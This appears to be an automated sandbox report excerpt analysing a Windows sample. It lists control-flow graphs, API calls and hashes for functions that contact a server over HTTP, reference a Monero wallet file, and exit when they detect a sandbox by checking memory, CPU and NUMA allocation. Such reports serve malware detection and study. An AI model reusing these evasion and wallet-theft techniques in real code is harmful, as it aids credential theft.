                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: HttpQueryInfoA$InternetSetOptionA
                                  • API String ID: 2238633743-1775429166
                                  • Opcode ID: 15286a640c1f616f6adf8dbdd984c74ca1186af567213c46b2f994a4eb3bac2b
                                  • Instruction ID: 39fde41c4f9a7ee0018d3166571b9db9f3f96bca18793950c7c5e431f9ea8c2e
                                  • Opcode Fuzzy Hash: 15286a640c1f616f6adf8dbdd984c74ca1186af567213c46b2f994a4eb3bac2b
                                  • Instruction Fuzzy Hash: 02621DB56182009FC345DFE8FC8896A7BB9A7CD701750871AF909D33B2D7B99942CB60
                                  Function 007E48D0 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 801 7e48d0-7e4992 call 7faab0 call 7e4800 call 7faa50 * 5 InternetOpenA StrCmpCA 816 7e499b-7e499f 801->816 817 7e4994 801->817 818 7e4f1b-7e4f43 InternetCloseHandle call 7fade0 call 7ea210 816->818 819 7e49a5-7e4b1d call 7f8cf0 call 7fac30 call 7fabb0 call 7fab10 * 2 call 7facc0 call 7fabb0 call 7fab10 call 7facc0 call 7fabb0 call 7fab10 call 7fac30 call 7fabb0 call 7fab10 call 7facc0 call 7fabb0 call 7fab10 call 7facc0 call 7fabb0 call 7fab10 call 7facc0 call 7fac30 call 7fabb0 call 7fab10 * 2 InternetConnectA 816->819 817->816 829 7e4f45-7e4f7d call 7fab30 call 7facc0 call 7fabb0 call 7fab10 818->829 830 7e4f82-7e4ff2 call 7f8b20 * 2 call 7faab0 call 7fab10 * 8 818->830 819->818 905 7e4b23-7e4b27 819->905 829->830 906 7e4b29-7e4b33 905->906 907 7e4b35 905->907 908 7e4b3f-7e4b72 HttpOpenRequestA 906->908 907->908 909 7e4f0e-7e4f15 InternetCloseHandle 908->909 910 7e4b78-7e4e78 call 7facc0 call 7fabb0 call 7fab10 call 7fac30 call 7fabb0 call 7fab10 call 7facc0 call 7fabb0 call 7fab10 call 7facc0 call 7fabb0 call 7fab10 call 7facc0 call 7fabb0 call 7fab10 call 7facc0 call 7fabb0 call 7fab10 call 7fac30 call 7fabb0 call 7fab10 call 7facc0 call 7fabb0 call 7fab10 call 7facc0 call 7fabb0 call 7fab10 call 7fac30 call 7fabb0 call 7fab10 call 7facc0 call 7fabb0 call 7fab10 call 7facc0 call 7fabb0 call 7fab10 call 7facc0 call 7fabb0 call 7fab10 call 7facc0 call 7fabb0 call 7fab10 call 7fac30 call 7fabb0 call 7fab10 call 7faa50 call 7fac30 * 2 call 7fabb0 call 7fab10 * 2 call 7fade0 lstrlen call 7fade0 * 2 lstrlen call 7fade0 HttpSendRequestA 908->910 909->818 1021 7e4e82-7e4eac InternetReadFile 910->1021 1022 7e4eae-7e4eb5 1021->1022 1023 7e4eb7-7e4f09 InternetCloseHandle call 7fab10 1021->1023 1022->1023 1024 7e4eb9-7e4ef7 call 7facc0 call 7fabb0 call 7fab10 1022->1024 1023->909 1024->1021
                                  APIs
                                    • Part of subcall function 007FAAB0: lstrcpy.KERNEL32(?,00000000), ref: 007FAAF6
                                    • Part of subcall function 007E4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 007E4889
                                    • Part of subcall function 007E4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 007E4899
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 007E4965
                                  • StrCmpCA.SHLWAPI(?,0145E350), ref: 007E498A
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 007E4B0A
                                  • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00800DDE,00000000,?,?,00000000,?,",00000000,?,0145E380), ref: 007E4E38
                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 007E4E54
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 007E4E68
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 007E4E99
                                  • InternetCloseHandle.WININET(00000000), ref: 007E4EFD
                                  • InternetCloseHandle.WININET(00000000), ref: 007E4F15
                                  • HttpOpenRequestA.WININET(00000000,0145E340,?,0145DB00,00000000,00000000,00400100,00000000), ref: 007E4B65
                                    • Part of subcall function 007FACC0: lstrlen.KERNEL32(?,01458B80,?,\Monero\wallet.keys,00800E1A), ref: 007FACD5
                                    • Part of subcall function 007FACC0: lstrcpy.KERNEL32(00000000), ref: 007FAD14
                                    • Part of subcall function 007FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007FAD22
                                    • Part of subcall function 007FABB0: lstrcpy.KERNEL32(?,00800E1A), ref: 007FAC15
                                    • Part of subcall function 007FAC30: lstrcpy.KERNEL32(00000000,?), ref: 007FAC82
                                    • Part of subcall function 007FAC30: lstrcat.KERNEL32(00000000), ref: 007FAC92
                                  • InternetCloseHandle.WININET(00000000), ref: 007E4F1F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                  • String ID: "$"$------$------$------
                                  • API String ID: 460715078-2180234286
                                  • Opcode ID: 14dab410fcd26003abaca6c0ff71ee8d8d094e73572ee8e1ddcf52bd027aed5c
                                  • Instruction ID: 8829e04c8a507895bfa66a354100fe602fe4c01ef07955c991d4dbd2a5c680a0
                                  • Opcode Fuzzy Hash: 14dab410fcd26003abaca6c0ff71ee8d8d094e73572ee8e1ddcf52bd027aed5c
                                  • Instruction Fuzzy Hash: B512EDB191121CEACB15EB94DDA6FFEB379AF14300F104199F20A62291DF786B48CF65
                                  Function 007F5760 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1090 7f5760-7f57c7 call 7f5d20 call 7fab30 * 3 call 7faa50 * 4 1106 7f57cc-7f57d3 1090->1106 1107 7f5827-7f589c call 7faa50 * 2 call 7e1590 call 7f5510 call 7fabb0 call 7fab10 call 7fade0 StrCmpCA 1106->1107 1108 7f57d5-7f5806 call 7fab30 call 7faab0 call 7e1590 call 7f5440 1106->1108 1134 7f58e3-7f58f9 call 7fade0 StrCmpCA 1107->1134 1138 7f589e-7f58de call 7faab0 call 7e1590 call 7f5440 call 7fabb0 call 7fab10 1107->1138 1124 7f580b-7f5822 call 7fabb0 call 7fab10 1108->1124 1124->1134 1139 7f58ff-7f5906 1134->1139 1140 7f5a2c-7f5a94 call 7fabb0 call 7fab30 * 2 call 7e16b0 call 7fab10 * 4 call 7e1670 call 7e1550 1134->1140 1138->1134 1144 7f590c-7f5913 1139->1144 1145 7f5a2a-7f5aaf call 7fade0 StrCmpCA 1139->1145 1270 7f5d13-7f5d16 1140->1270 1149 7f596e-7f59e3 call 7faa50 * 2 call 7e1590 call 7f5510 call 7fabb0 call 7fab10 call 7fade0 StrCmpCA 1144->1149 1150 7f5915-7f5969 call 7fab30 call 7faab0 call 7e1590 call 7f5440 call 7fabb0 call 7fab10 1144->1150 1164 7f5ab5-7f5abc 1145->1164 1165 7f5be1-7f5c49 call 7fabb0 call 7fab30 * 2 call 7e16b0 call 7fab10 * 4 call 7e1670 call 7e1550 1145->1165 1149->1145 1250 7f59e5-7f5a25 call 7faab0 call 7e1590 call 7f5440 call 7fabb0 call 7fab10 1149->1250 1150->1145 1171 7f5bdf-7f5c64 call 7fade0 StrCmpCA 1164->1171 1172 7f5ac2-7f5ac9 1164->1172 1165->1270 1201 7f5c78-7f5ce1 call 7fabb0 call 7fab30 * 2 call 7e16b0 call 7fab10 * 4 call 7e1670 call 7e1550 1171->1201 1202 7f5c66-7f5c71 Sleep 1171->1202 1179 7f5acb-7f5b1e call 7fab30 call 7faab0 call 7e1590 call 7f5440 call 7fabb0 call 7fab10 1172->1179 1180 7f5b23-7f5b98 call 7faa50 * 2 call 7e1590 call 7f5510 call 7fabb0 call 7fab10 call 7fade0 StrCmpCA 1172->1180 1179->1171 1180->1171 1275 7f5b9a-7f5bda call 7faab0 call 7e1590 call 7f5440 call 7fabb0 call 7fab10 1180->1275 1201->1270 1202->1106 1250->1145 1275->1171
                                  APIs
                                    • Part of subcall function 007FAB30: lstrlen.KERNEL32(007E4F55,?,?,007E4F55,00800DDF), ref: 007FAB3B
                                    • Part of subcall function 007FAB30: lstrcpy.KERNEL32(00800DDF,00000000), ref: 007FAB95
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 007F5894
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 007F58F1
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 007F5AA7
                                    • Part of subcall function 007FAAB0: lstrcpy.KERNEL32(?,00000000), ref: 007FAAF6
                                    • Part of subcall function 007F5440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 007F5478
                                    • Part of subcall function 007FABB0: lstrcpy.KERNEL32(?,00800E1A), ref: 007FAC15
                                    • Part of subcall function 007F5510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 007F5568
                                    • Part of subcall function 007F5510: lstrlen.KERNEL32(00000000), ref: 007F557F
                                    • Part of subcall function 007F5510: StrStrA.SHLWAPI(00000000,00000000), ref: 007F55B4
                                    • Part of subcall function 007F5510: lstrlen.KERNEL32(00000000), ref: 007F55D3
                                    • Part of subcall function 007F5510: lstrlen.KERNEL32(00000000), ref: 007F55FE
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 007F59DB
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 007F5B90
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 007F5C5C
                                  • Sleep.KERNEL32(0000EA60), ref: 007F5C6B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen$Sleep
                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                  • API String ID: 507064821-2791005934
                                  • Opcode ID: 5c857eb9ebc0771491b41df089602047dab9e0ea4350ae6cf203558ef1ae4b39
                                  • Instruction ID: f32268f392acfa05c8d01dfd72f0d99b52447a31916fe8fd02bb2384cdfffe3f
                                  • Opcode Fuzzy Hash: 5c857eb9ebc0771491b41df089602047dab9e0ea4350ae6cf203558ef1ae4b39
                                  • Instruction Fuzzy Hash: 1DE134B191010CEACB14FBA4DDAB9FD773DAF54340F408558B61A56292EF3C6A18CB52
                                  Function 007F19F0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1301 7f19f0-7f1a1d call 7fade0 StrCmpCA 1304 7f1a1f-7f1a21 ExitProcess 1301->1304 1305 7f1a27-7f1a41 call 7fade0 1301->1305 1309 7f1a44-7f1a48 1305->1309 1310 7f1a4e-7f1a61 1309->1310 1311 7f1c12-7f1c1d call 7fab10 1309->1311 1313 7f1bee-7f1c0d 1310->1313 1314 7f1a67-7f1a6a 1310->1314 1313->1309 1316 7f1b1f-7f1b30 StrCmpCA 1314->1316 1317 7f1bdf-7f1be9 call 7fab30 1314->1317 1318 7f1afd-7f1b0e StrCmpCA 1314->1318 1319 7f1a99-7f1aa8 call 7fab30 1314->1319 1320 7f1a71-7f1a80 call 7fab30 1314->1320 1321 7f1acf-7f1ae0 StrCmpCA 1314->1321 1322 7f1aad-7f1abe StrCmpCA 1314->1322 1323 7f1a85-7f1a94 call 7fab30 1314->1323 1324 7f1b63-7f1b74 StrCmpCA 1314->1324 1325 7f1b82-7f1b93 StrCmpCA 1314->1325 1326 7f1b41-7f1b52 StrCmpCA 1314->1326 1327 7f1ba1-7f1bb2 StrCmpCA 1314->1327 1328 7f1bc0-7f1bd1 StrCmpCA 1314->1328 1329 7f1b3c 1316->1329 1330 7f1b32-7f1b35 1316->1330 1317->1313 1350 7f1b1a 1318->1350 1351 7f1b10-7f1b13 1318->1351 1319->1313 1320->1313 1348 7f1aee-7f1af1 1321->1348 1349 7f1ae2-7f1aec 1321->1349 1346 7f1aca 1322->1346 1347 7f1ac0-7f1ac3 1322->1347 1323->1313 1333 7f1b76-7f1b79 1324->1333 1334 7f1b80 1324->1334 1335 7f1b9f 1325->1335 1336 7f1b95-7f1b98 1325->1336 1331 7f1b5e 1326->1331 1332 7f1b54-7f1b57 1326->1332 1337 7f1bbe 1327->1337 1338 7f1bb4-7f1bb7 1327->1338 1340 7f1bdd 1328->1340 1341 7f1bd3-7f1bd6 1328->1341 1329->1313 1330->1329 1331->1313 1332->1331 1333->1334 1334->1313 1335->1313 1336->1335 1337->1313 1338->1337 1340->1313 1341->1340 1346->1313 1347->1346 1355 7f1af8 1348->1355 1349->1355 1350->1313 1351->1350 1355->1313
                                  APIs
                                  • StrCmpCA.SHLWAPI(00000000,block), ref: 007F1A15
                                  • ExitProcess.KERNEL32 ref: 007F1A21
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID: block
                                  • API String ID: 621844428-2199623458
                                  • Opcode ID: f22d8766322be67c3163fed1ee42e653a49a39e92819182b6021150dc9326166
                                  • Instruction ID: dcec34335ab4a2e7aaeec226c407e3d92c96ab35b3f6f96f12dbc8c5ad8ff40b
                                  • Opcode Fuzzy Hash: f22d8766322be67c3163fed1ee42e653a49a39e92819182b6021150dc9326166
                                  • Instruction Fuzzy Hash: 0E513BB4A0420DEBCB04DFE4D954ABE77B9EF44304F508148E916AB391E7B8E941DB62
                                  Function 007F6C90 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 007F9BB0: GetProcAddress.KERNEL32(75900000,01450720), ref: 007F9BF1
                                    • Part of subcall function 007F9BB0: GetProcAddress.KERNEL32(75900000,014507E0), ref: 007F9C0A
                                    • Part of subcall function 007F9BB0: GetProcAddress.KERNEL32(75900000,014507C8), ref: 007F9C22
                                    • Part of subcall function 007F9BB0: GetProcAddress.KERNEL32(75900000,01450798), ref: 007F9C3A
                                    • Part of subcall function 007F9BB0: GetProcAddress.KERNEL32(75900000,01450828), ref: 007F9C53
                                    • Part of subcall function 007F9BB0: GetProcAddress.KERNEL32(75900000,01458940), ref: 007F9C6B
                                    • Part of subcall function 007F9BB0: GetProcAddress.KERNEL32(75900000,014464E0), ref: 007F9C83
                                    • Part of subcall function 007F9BB0: GetProcAddress.KERNEL32(75900000,01446460), ref: 007F9C9C
                                    • Part of subcall function 007F9BB0: GetProcAddress.KERNEL32(75900000,01450840), ref: 007F9CB4
                                    • Part of subcall function 007F9BB0: GetProcAddress.KERNEL32(75900000,01450558), ref: 007F9CCC
                                    • Part of subcall function 007F9BB0: GetProcAddress.KERNEL32(75900000,01450570), ref: 007F9CE5
                                    • Part of subcall function 007F9BB0: GetProcAddress.KERNEL32(75900000,01450588), ref: 007F9CFD
                                    • Part of subcall function 007F9BB0: GetProcAddress.KERNEL32(75900000,014463C0), ref: 007F9D15
                                    • Part of subcall function 007F9BB0: GetProcAddress.KERNEL32(75900000,01450600), ref: 007F9D2E
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                    • Part of subcall function 007E11D0: ExitProcess.KERNEL32 ref: 007E1211
                                    • Part of subcall function 007E1160: GetSystemInfo.KERNEL32(?), ref: 007E116A
                                    • Part of subcall function 007E1160: ExitProcess.KERNEL32 ref: 007E117E
                                    • Part of subcall function 007E1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 007E112B
                                    • Part of subcall function 007E1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 007E1132
                                    • Part of subcall function 007E1110: ExitProcess.KERNEL32 ref: 007E1143
                                    • Part of subcall function 007E1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 007E123E
                                    • Part of subcall function 007E1220: __aulldiv.LIBCMT ref: 007E1258
                                    • Part of subcall function 007E1220: __aulldiv.LIBCMT ref: 007E1266
                                    • Part of subcall function 007E1220: ExitProcess.KERNEL32 ref: 007E1294
                                    • Part of subcall function 007F6A10: GetUserDefaultLangID.KERNEL32 ref: 007F6A14
                                    • Part of subcall function 007E1190: ExitProcess.KERNEL32 ref: 007E11C6
                                    • Part of subcall function 007F79E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,007E11B7), ref: 007F7A10
                                    • Part of subcall function 007F79E0: RtlAllocateHeap.NTDLL(00000000), ref: 007F7A17
                                    • Part of subcall function 007F79E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 007F7A2F
                                    • Part of subcall function 007F7A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 007F7AA0
                                    • Part of subcall function 007F7A70: RtlAllocateHeap.NTDLL(00000000), ref: 007F7AA7
                                    • Part of subcall function 007F7A70: GetComputerNameA.KERNEL32(?,00000104), ref: 007F7ABF
                                    • Part of subcall function 007FACC0: lstrlen.KERNEL32(?,01458B80,?,\Monero\wallet.keys,00800E1A), ref: 007FACD5
                                    • Part of subcall function 007FACC0: lstrcpy.KERNEL32(00000000), ref: 007FAD14
                                    • Part of subcall function 007FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007FAD22
                                    • Part of subcall function 007FABB0: lstrcpy.KERNEL32(?,00800E1A), ref: 007FAC15
                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01458960,?,008010F4,?,00000000,?,008010F8,?,00000000,00800AF3), ref: 007F6D6A
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 007F6D88
                                  • CloseHandle.KERNEL32(00000000), ref: 007F6D99
                                  • Sleep.KERNEL32(00001770), ref: 007F6DA4
                                  • CloseHandle.KERNEL32(?,00000000,?,01458960,?,008010F4,?,00000000,?,008010F8,?,00000000,00800AF3), ref: 007F6DBA
                                  • ExitProcess.KERNEL32 ref: 007F6DC2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                  • String ID:
                                  • API String ID: 2525456742-0
                                  • Opcode ID: 8b78bb5aaec22b9dbf3fe88f6f06ceffc2b82eab73cb5f97eec911ca819bf9da
                                  • Instruction ID: 25c83f150daaef4228f40e74d08142720c332c970ebae297edc8a47ccb375874
                                  • Opcode Fuzzy Hash: 8b78bb5aaec22b9dbf3fe88f6f06ceffc2b82eab73cb5f97eec911ca819bf9da
                                  • Instruction Fuzzy Hash: 4C31DCB1A0410CEBCB04F7F0DC5BABE7779AF54340F504658F216A6292DF786905C662
                                  Function 007E1220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1436 7e1220-7e1247 call 7f8b40 GlobalMemoryStatusEx 1439 7e1249-7e1271 call 7fdd30 * 2 1436->1439 1440 7e1273-7e127a 1436->1440 1442 7e1281-7e1285 1439->1442 1440->1442 1444 7e129a-7e129d 1442->1444 1445 7e1287 1442->1445 1447 7e1289-7e1290 1445->1447 1448 7e1292-7e1294 ExitProcess 1445->1448 1447->1444 1447->1448
                                  APIs
                                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 007E123E
                                  • __aulldiv.LIBCMT ref: 007E1258
                                  • __aulldiv.LIBCMT ref: 007E1266
                                  • ExitProcess.KERNEL32 ref: 007E1294
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                  • String ID: @
                                  • API String ID: 3404098578-2766056989
                                  • Opcode ID: 79dbca01198334dbe7bf2fe6308504a16dc8b44b47b90d63cae71e687e1175ef
